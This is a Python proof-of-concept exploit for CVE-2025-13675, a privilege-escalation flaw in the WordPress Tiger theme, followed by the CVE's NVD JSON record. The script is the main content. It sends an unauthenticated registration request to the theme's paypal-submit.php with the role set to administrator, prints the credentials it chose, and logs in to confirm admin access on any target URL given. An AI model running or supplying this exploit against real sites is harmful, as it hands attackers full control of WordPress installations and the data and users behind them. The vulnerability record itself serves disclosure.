CVE-2025-13675

import requests import re # CVE-2025-13675 PoC - WordPress Tiger Theme Privilege Escalation # Target: WordPress site using Tiger theme <= 101.2.1 def exploit_tiger_theme(target_url): """ Exploit the privilege escalation vulnerability in Tiger theme. Attackers can register as administrator by manipulating the role parameter. """ target_url = target_url.rstrip('/') # Path to the vulnerable paypal-submit.php file vulnerable_endpoint = f"{target_url}/wp-content/themes/tiger/inc/paypal-submit.php" # Generate random username and email for registration import uuid username = f"admin_{uuid.uuid4().hex[:8]}" email = f"{username}@attacker.com" # Prepare registration data with administrator role # This is the key exploit: specifying 'administrator' as the role payload = { 'user_login': username, 'user_email': email, 'user_pass': 'P@ssw0rd123!', 'role': 'administrator', # Privilege escalation - requesting admin role 'task': 'register' } print(f"[*] Target: {target_url}") print(f"[*] Exploiting vulnerable endpoint: {vulnerable_endpoint}") print(f"[*] Attempting to register administrator account: {username}") try: response = requests.post(vulnerable_endpoint, data=payload, timeout=30) if response.status_code == 200: print(f"[+] Registration request sent successfully") print(f"[+] Check if account was created with administrator privileges") print(f"[+] Credentials: {username} / P@ssw0rd123!") # Verify the created account login_url = f"{target_url}/wp-login.php" verify_data = { 'log': username, 'pwd': 'P@ssw0rd123!', 'rememberme': 'forever', 'redirect_to': f"{target_url}/wp-admin/" } session = requests.Session() login_response = session.post(login_url, data=verify_data, allow_redirects=False) if 'admin' in login_response.headers.get('Location', '') or login_response.status_code == 302: print(f"[+] SUCCESS: Administrator account created and login verified!") return True else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_tiger_theme(target) else: print("Usage: python cve-2025-13675.py http://target.com")

{"cve": {"id": "CVE-2025-13675", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:15.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tiger theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 101.2.1. This is due to the 'paypal-submit.php' file not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://themeforest.net/item/tiger-social-network-theme-for-companies-professionals/16203995", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve", "source": "[email protected]"}]}}